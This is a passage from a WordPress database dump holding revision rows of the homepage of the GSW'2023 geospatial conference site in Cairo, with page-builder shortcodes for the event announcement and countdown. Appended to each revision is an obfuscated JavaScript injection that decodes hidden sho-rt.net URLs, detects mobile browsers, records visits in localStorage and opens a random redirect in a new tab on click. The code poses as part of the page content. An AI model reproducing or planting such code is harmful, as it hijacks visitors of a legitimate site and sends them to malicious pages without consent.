_0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 16:20:35','2022-11-09 16:20:35','',3066,'https://gsw2023.com/?p=3161',0,'revision','',0),
(3162,1,'2022-11-09 16:25:58','2022-11-09 16:25:58','','c22','','inherit','open','closed','','c22','','','2022-11-09 16:32:06','2022-11-09 16:32:06','',3066,'https://gsw2023.com/wp-content/uploads/2022/11/c22.jpg',0,'attachment','image/jpeg',0),
(3163,1,'2022-11-09 16:26:12','2022-11-09 16:26:12','[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]\r\n<h3>EGYPT GSW\'2023</h3>\r\n<h3>The First Geospatial Week in Africa and The Middle East</h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"799x800\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^2275|url^https://gsw2023.com/wp-content/uploads/2022/10/aast32.jpg|caption^null|alt^null|title^aast32|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668010285886{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 16:26:12','2022-11-09 16:26:12','',3066,'https://gsw2023.com/?p=3163',0,'revision','',0),
(3164,1,'2022-11-09 16:26:54','2022-11-09 16:26:54','[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]\r\n<h3>EGYPT GSW\'2023</h3>\r\n<h3>The First Geospatial Week in Africa and The Middle East</h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"999x800\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^2275|url^https://gsw2023.com/wp-content/uploads/2022/10/aast32.jpg|caption^null|alt^null|title^aast32|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668010285886{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return 